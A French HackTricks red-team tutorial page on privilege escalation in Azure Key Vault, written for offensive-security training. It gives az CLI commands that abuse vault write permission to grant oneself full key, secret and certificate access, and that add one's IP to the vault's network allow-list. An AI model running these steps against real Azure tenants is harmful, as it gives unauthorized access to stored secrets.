Az - Key Vault Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Azure Key Vault

Pour plus d’informations sur ce service, consultez :

Az - Key Vault

Microsoft.KeyVault/vaults/write

Un attaquant disposant de cette autorisation pourra modifier la politique d’un coffre-fort de clĂ©s (le coffre-fort de clĂ©s doit utiliser des politiques d’accĂšs au lieu de RBAC).

# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>

# Get current principal ID
az ad signed-in-user show --query id --output tsv

# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all

Modifier les restrictions réseau

Il se peut que vous ayez suffisamment de permissions pour accĂ©der Ă  des donnĂ©es sensibles (comme la valeur d’un secret) mais que vous ne puissiez pas y accĂ©der car le key vault est restreint Ă  un rĂ©seau spĂ©cifique. Si vous avez la permission de modifier les restrictions rĂ©seau, vous pouvez ajouter votre IP Ă  la liste des IP autorisĂ©es.

# Get the current network restrictions
az keyvault network-rule list --name <vault-name>

# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks